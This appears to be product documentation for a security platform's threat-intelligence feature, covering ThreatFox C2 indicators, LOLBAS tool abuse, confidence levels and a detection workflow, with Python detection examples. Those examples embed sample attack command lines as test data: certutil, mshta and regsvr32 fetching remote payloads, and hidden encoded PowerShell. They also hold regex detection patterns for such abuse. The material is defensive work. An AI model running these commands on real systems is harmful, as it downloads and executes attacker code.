
Threat Intelligence

What is Threat Intelligence?

Threat Intelligence in Tripl-i provides automated integration with trusted security data sources to identify known malicious software, network infrastructure, and attack patterns. This data powers the security detection capabilities across the platform.

Why Threat Intelligence Matters

  • Stay Current: The threat landscape changes daily as new malware variants and C2 servers appear
  • Expert Curation: Leverage security researcher expertise without dedicated staff
  • Automated Updates: No manual IOC management required
  • Proven Data: Industry-trusted sources with verified threat data

Integrated Sources

ThreatFox (abuse.ch)

The primary source for malware command & control (C2) infrastructure.

Metric           | Value
Total IOCs       | 51,877+
Malware Families | 160+
Unique IPs       | 32,774+
Update Frequency | Daily
Confidence       | High (verified C2 servers; each IOC also carries its own confidence level, see Confidence Levels below)

Top Tracked Threats:

Malware Family | IOC Count | Threat Type
Xtreme RAT     | 8,545     | Remote Access Trojan
Cobalt Strike  | 8,099     | C2 Framework
Meterpreter    | 2,517     | Post-exploitation
AsyncRAT       | 2,282     | Remote Access Trojan
Sliver         | 2,221     | C2 Framework
Remcos         | 2,152     | Remote Access Trojan

LOLBAS (Living Off The Land)

Tracks legitimate Windows system tools that can be abused for malicious purposes.

Metric           | Value
Binaries Tracked | 200+
Techniques       | Execution, download, encode/decode, application-control and UAC bypass
MITRE Mapping    | Each entry mapped to its ATT&CK technique IDs

Common LOLBAS Tools:

  • certutil.exe - Download files (-urlcache) and encode/decode payloads
  • mshta.exe - Execute HTA applications, including ones fetched from a URL
  • regsvr32.exe - Proxy execution of COM scriptlets
  • rundll32.exe - Execute exported DLL functions
  • powershell.exe - Script execution, including encoded and download-cradle commands

All of these are signed Microsoft binaries with everyday legitimate uses, so a detection keys on the arguments and the parent process rather than on the binary alone.
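A triage pass over constructed process-creation events, as an added example (not Tripl-i code) of how the binaries listed above are separated from their routine use. The event shape (image, command line, parent image, user), the argument patterns and the parent-process escalation rule are assumptions made for the example; the sample events are constructed and use the 198.51.100.0/24 documentation range.

```python
"""Triage constructed process-creation events for LOLBAS abuse.

Added example, not Tripl-i code. The event shape, the regexes and the
parent-process rule are assumptions; a LOLBAS binary merely running is
not a finding, its arguments and parent are.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


# (binary, case-insensitive regex over the command line, technique)
LOLBAS_RULES = [
    ("certutil.exe", r"-urlcache|-decode\b|-encode\b",
     "download or decode a file via certutil"),
    ("mshta.exe", r"https?://|javascript:|vbscript:",
     "remote or inline HTA execution"),
    ("regsvr32.exe", r"/i:https?://|scrobj\.dll",
     "COM scriptlet proxy execution"),
    ("rundll32.exe", r"javascript:|https?://",
     "script or remote DLL execution via rundll32"),
    ("powershell.exe",
     r"-e(?:nc|ncodedcommand)?\s|downloadstring|downloadfile|\biex\b"
     r"|invoke-expression|-w(?:indowstyle)?\s+hidden|executionpolicy\s+bypass|-ep\s+bypass",
     "encoded, hidden or download-cradle PowerShell"),
]

# A LOLBAS binary spawned by an Office or scripting host is almost never routine.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe",
                      "outlook.exe", "wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def triage(events):
    """Return one finding per event whose arguments match an abuse pattern.

    Severity is Critical when the parent is an Office/scripting host, High
    otherwise (assumed policy for this example)."""
    findings = []
    for ev in events:
        image = basename(ev.image)
        for binary, pattern, technique in LOLBAS_RULES:
            if image == binary and re.search(pattern, ev.command_line, re.IGNORECASE):
                parent = basename(ev.parent_image)
                findings.append({
                    "host": ev.host, "user": ev.user, "binary": binary,
                    "parent": parent, "technique": technique,
                    "severity": "Critical" if parent in SUSPICIOUS_PARENTS else "High",
                    "command_line": ev.command_line,
                })
                break
    return findings


# Constructed sample events: two benign uses, four abuses.
SAMPLE_EVENTS = [
    ProcessEvent("WORKSTATION-001", "jdoe",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://198.51.100.7/a.txt C:\Users\Public\a.txt"),
    ProcessEvent("SERVER-01", "svc_backup", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -verify C:\certs\app.cer"),
    ProcessEvent("WORKSTATION-002", "asmith", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\mshta.exe",
                 r"mshta.exe http://198.51.100.7/p.hta"),
    ProcessEvent("WORKSTATION-002", "asmith", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\regsvr32.exe",
                 r"regsvr32.exe /s /n /u /i:http://198.51.100.7/s.sct scrobj.dll"),
    ProcessEvent("SERVER-02", "admin", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\backup.ps1"),
    ProcessEvent("WORKSTATION-003", "jdoe",
                 r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['host']} {f['parent']} -> {f['binary']}: {f['technique']}")
```

The two benign launches (certutil verifying a certificate, PowerShell running a signed backup script from cmd.exe) produce no finding; the abuses are reported with the parent process, which is what an analyst checks first under "Interpreting Detections" below.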

CISA KEV (Coming Soon)

Known Exploited Vulnerabilities catalog from the US Cybersecurity and Infrastructure Security Agency (CISA).

  • Vulnerabilities with evidence of active exploitation
  • Remediation due dates (binding on US federal civilian agencies under BOD 22-01)
  • Vendor/product impact mapping

Understanding Threat Data

Indicators of Compromise (IOCs)

IOCs are forensic artifacts that indicate potential malicious activity:

IOC Type   | Example                | Detection Method
IP Address | 185.243.112.80         | Network connection monitoring
Domain     | malware-c2.com         | DNS query analysis
URL        | http://bad.com/payload | Web traffic inspection
File Hash  | SHA256 fingerprint     | File integrity checking
Process    | suspicious.exe         | Process monitoring

Confidence Levels

Each IOC has an associated confidence level:

Level  | Meaning                | Action Recommendation
High   | Verified malicious     | Immediate response
Medium | Likely malicious       | Investigation required
Low    | Potentially suspicious | Monitor and assess

Threat Types

Common threat classifications in the system:

Type         | Description                        | Risk Level
Ransomware   | Encrypts files for ransom          | Critical
Botnet       | Part of coordinated attack network | Critical
RAT          | Remote Access Trojan               | Critical
C2 Framework | Command & Control tools            | Critical
Backdoor     | Unauthorized access mechanism      | High
Trojan       | Disguised malicious software       | High
Spyware      | Information stealing malware       | High
Rootkit      | Deep system compromise             | Critical

Viewing Threat Intelligence

Policy Details

Each software policy sourced from threat intelligence includes:

  1. Source Information: Which feed provided the data
  2. Last Updated: When the data was refreshed
  3. IOC Count: Number of indicators associated
  4. Threat Notes: Context about the threat

Network IOC Details

For policies with network indicators:

  • IP Addresses: Known C2 server IPs
  • Ports: Communication ports used
  • Direction: Inbound, outbound, or both
  • Last Seen: Most recent observation date

Data Quality

Why We Choose These Sources

Criteria            | ThreatFox                           | LOLBAS
Reputation          | Industry standard                   | Community trusted
False Positive Rate | Very low                            | Low (context-dependent: the binaries are legitimate, only their use is suspicious)
Update Speed        | Continuous upstream, imported daily | Community-driven
Verification        | Security researcher verified        | Documented techniques
Coverage            | C2 infrastructure                   | System tool abuse

Sources We Avoid

Not all threat feeds are equal. We specifically avoid sources with:

  • High false positive rates
  • Unverified submissions
  • Short retention windows (lists that only keep the last 48 hours, so a C2 server seen three days ago is already gone)
  • Mixed attack types (SSH brute force mixed with C2)

Threat Intelligence in Action

Detection Workflow

1. Threat feed updated with new Cobalt Strike C2 IP

2. Tripl-i imports IOC into Software Policy

3. Network scan runs for tenant

4. Connection to C2 IP detected

5. Security event created with full context

6. Notification sent to security team

Example Detection

When a workstation connects to a known Cobalt Strike server:

Event Details:

  • Title: Network IOC Detected: Cobalt Strike C2
  • Severity: Critical
  • Host: WORKSTATION-001
  • Remote IP: 47.95.207.79:443
  • Process: svchost.exe
  • Action Required: Immediate investigation
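The workflow above, the Cobalt Strike event it produces, and the per-combination exclusions described under "Reducing False Positives" and in the FAQ, carried through as an added example (not Tripl-i code). The feed is constructed and only loosely follows ThreatFox's export fields (ioc_value, ioc_type, malware, threat_type, confidence_level, last_seen_utc); the connection records, the exclusion format, the confidence thresholds and the confidence-to-severity mapping are assumptions made for the example. 47.95.207.79:443 is the page's own example address; the other addresses come from the RFC 5737 documentation ranges.

```python
"""Network IOC detection end to end: import a feed, scan connection
records, honour documented exclusions, emit events.

Added example, not Tripl-i code. Feed fields, connection shape, exclusion
format and thresholds are assumptions.
"""
import json
from dataclasses import dataclass

# Constructed feed in a ThreatFox-like shape (assumed, not the real export).
FEED_JSON = json.dumps([
    {"ioc_value": "47.95.207.79:443", "ioc_type": "ip:port", "malware": "Cobalt Strike",
     "threat_type": "botnet_cc", "confidence_level": 100, "last_seen_utc": "2024-05-01 10:00:00"},
    {"ioc_value": "203.0.113.10:8080", "ioc_type": "ip:port", "malware": "AsyncRAT",
     "threat_type": "botnet_cc", "confidence_level": 60, "last_seen_utc": "2024-04-28 03:12:00"},
    {"ioc_value": "update-check.example", "ioc_type": "domain", "malware": "Remcos",
     "threat_type": "botnet_cc", "confidence_level": 40, "last_seen_utc": "2024-04-20 18:40:00"},
])

LEVELS = ["Low", "Medium", "High"]
ACTION = {"High": "Immediate response", "Medium": "Investigation required", "Low": "Monitor and assess"}
SEVERITY = {"High": "Critical", "Medium": "High", "Low": "Medium"}  # assumed mapping


def confidence_label(level: int) -> str:
    """Map a 0-100 feed confidence onto High/Medium/Low (thresholds assumed)."""
    return "High" if level >= 75 else "Medium" if level >= 50 else "Low"


@dataclass(frozen=True)
class Indicator:
    value: str
    malware: str
    threat_type: str
    confidence: str
    last_seen: str


def load_feed(text: str) -> dict:
    """Index ip:port and domain indicators; other IOC types are skipped here."""
    index = {}
    for rec in json.loads(text):
        ind = Indicator(rec["ioc_value"], rec["malware"], rec["threat_type"],
                        confidence_label(rec["confidence_level"]), rec["last_seen_utc"])
        if rec["ioc_type"] == "ip:port":
            ip, port = rec["ioc_value"].rsplit(":", 1)
            index[("ip", ip, int(port))] = ind
        elif rec["ioc_type"] == "domain":
            index[("domain", rec["ioc_value"].lower())] = ind
    return index


def lookup(index: dict, conn: dict):
    """Exact ip:port keeps the feed confidence. The same IP on another port is
    downgraded one level (shared hosting caveat). Domains match on the name the
    connection resolved from, if the record carries one."""
    ind = index.get(("ip", conn["remote_ip"], conn["remote_port"]))
    if ind:
        return ind, ind.confidence
    for key, cand in index.items():
        if key[0] == "ip" and key[1] == conn["remote_ip"]:
            return cand, LEVELS[max(0, LEVELS.index(cand.confidence) - 1)]
    if conn.get("dns_name"):
        ind = index.get(("domain", conn["dns_name"].lower()))
        if ind:
            return ind, ind.confidence
    return None, None


def scan(index: dict, connections: list, exclusions: set):
    """Return (events, excluded_count). An exclusion is the exact
    (host, remote_ip, process) combination, never the bare indicator."""
    events, excluded = [], 0
    for conn in connections:
        ind, conf = lookup(index, conn)
        if ind is None:
            continue
        if (conn["host"], conn["remote_ip"], conn["process"]) in exclusions:
            excluded += 1
            continue
        events.append({
            "title": f"Network IOC Detected: {ind.malware} C2",
            "severity": SEVERITY[conf], "confidence": conf, "action": ACTION[conf],
            "host": conn["host"], "process": conn["process"],
            "remote": f"{conn['remote_ip']}:{conn['remote_port']}",
            "direction": conn["direction"], "indicator": ind.value,
            "last_seen": ind.last_seen, "source": "ThreatFox (constructed sample)",
        })
    return events, excluded


# Constructed connection records from a tenant scan.
CONNECTIONS = [
    {"host": "WORKSTATION-001", "process": "svchost.exe", "remote_ip": "47.95.207.79",
     "remote_port": 443, "direction": "outbound"},
    {"host": "WORKSTATION-002", "process": "chrome.exe", "remote_ip": "47.95.207.79",
     "remote_port": 80, "direction": "outbound"},
    {"host": "SERVER-01", "process": "backup.exe", "remote_ip": "203.0.113.10",
     "remote_port": 8080, "direction": "outbound"},
    {"host": "WORKSTATION-003", "process": "outlook.exe", "remote_ip": "198.51.100.5",
     "remote_port": 443, "direction": "outbound", "dns_name": "update-check.example"},
    {"host": "WORKSTATION-003", "process": "teams.exe", "remote_ip": "198.51.100.9",
     "remote_port": 443, "direction": "outbound"},
]
# Documented exclusion (constructed): verified vendor endpoint on shared hosting.
EXCLUSIONS = {("SERVER-01", "203.0.113.10", "backup.exe")}

if __name__ == "__main__":
    events, skipped = scan(load_feed(FEED_JSON), CONNECTIONS, EXCLUSIONS)
    for e in events:
        print(f"[{e['severity']}] {e['title']} host={e['host']} remote={e['remote']} "
              f"process={e['process']} action={e['action']}")
    print(f"{skipped} connection(s) suppressed by exclusions")
```

The first connection reproduces the event shown above (Critical, svchost.exe to 47.95.207.79:443). The second hits the same IP on a different port and comes out one level lower, which is the shared-hosting case from "Reducing False Positives". The backup server's match is suppressed only for that exact host/IP/process combination, so the same AsyncRAT indicator still fires anywhere else.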

Best Practices

Interpreting Detections

  1. Verify the Connection: Confirm the network connection exists
  2. Check the Process: Is it a legitimate process or suspicious?
  3. Review Context: What was the user doing?
  4. Assess Impact: What data could be compromised?
  5. Contain if Needed: Isolate the system if confirmed

Reducing False Positives

  • Some legitimate services may share hosting with malicious infrastructure
  • Cloud provider IPs may have historical malicious associations
  • Add exclusions for verified false positives, scoped to the exact host, process and remote address rather than suppressing the indicator outright
  • Document exclusion decisions for audit

Staying Informed

  • Review critical severity detections immediately
  • Trend high-severity detections weekly
  • Audit medium/low severity monthly
  • Update exclusion lists as needed

Frequently Asked Questions

Q: How current is the threat data? A: Threat intelligence feeds are updated daily. Critical threats may be updated more frequently.

Q: Can I add my own threat indicators? A: Yes, create manual software policies with custom IOCs through the UI.

Q: What if a detection is a false positive? A: Add an exclusion to the policy and document the reason. The system will stop alerting on that specific combination.

Q: Are all detections confirmed compromises? A: No, detections indicate connections to known malicious infrastructure. Investigation is required to confirm actual compromise.